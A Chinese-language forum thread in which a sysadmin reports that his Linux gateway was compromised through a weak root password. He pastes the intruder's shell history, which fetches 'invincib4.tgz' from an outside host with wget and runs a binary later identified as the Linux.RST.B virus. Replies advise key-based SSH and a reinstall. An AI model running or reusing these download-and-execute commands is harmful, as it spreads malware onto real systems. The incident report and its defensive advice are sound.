linux网关被人攻下来，不知在里面干了什么？

hjfhjfhjf

我在公司里用red hat as 4建了一个网关，root用户密码比较简单，平时晚上都关掉的，在上个星期五晚上下班时忘了关了，星期六与星期天有人扫描到我的机器（本机有两块网卡，一个外网，有固定IP，一个内网），把我的root密码攻破了，进来后在/etc/passwd里增加了许多uid gid为0的用户，并且/bin /usr/sbin /usr/bin 等等目录和文件用lsattr看增加了suS-iadAc---- 属性，netstat等命令已经被改过了，看不过打开端口，在.bash_history里有
w
ps -x
ps -aux
cd /var/tmp
ls
cd screen
ls
wget bebemic.uv.ro/invincib4.tgz
tar zxvf invincib4.tgz
cd arhive
cd lin
./lin
cd /var/tmp
ls
cat /proc/cpuinfo
w
ps -x
cat /proc/cpuinfo
w
ps -x
cd /var/tmp
ls
cd /tmp
ls
wget bebemic.uv.ro/invincib4.tgz
ftp
ftp
cd /tmp
ls
tar zxvf invincib4.tgz
cd arhive
cd lin
./lin
w
ps -x
w
ps -x
cd /var/tmp
ls
cd arhive
ls
cd /tmp
ls
cd arhive
cd lin
./lin
w
ps -x
kill -9 4640

后我用好机器里的netstat 替换过来，看到有一个./lin程序在运行，但我查invincib4.tgz，不知道是什么东西？可能我的水平不高，上CU问问高手

exitgogo

都是密码惹的祸，KEY认证哪有此问题！

gucuiwen

放心，那个进入你机器的人的水平也不高。 、
如果服务器只是单做网关的话，干脆就直接重装得了，省得麻烦。
还有，以后SSH不要用密码登陆方式了，改用key方式。如果没有在外登陆维护的必要，干脆SSH也关了得了。

hjfhjfhjf

我现在就是好奇，他进入我机器都干了些什么，我也不想重装，烦，我现在正在一点点的改他所做的一切，正好让我也对安全重新认识一下，还有现在用lsattr /etc发现，有一个I 的属性，用chattr -I /etc去不掉，不知这个属性是干什么的，他装的那个软件是用来干什么的，网上搜不到这方面的东西，好像这个软件像是一个木马，用一个大于1024的端口，向外连接，昨天我把iptables 打开了，他昨天晚上又连了，没连上，我干脆把他的IP也给禁了，呵呵

zhanghm

lin
病毒名称：Linux.RST.B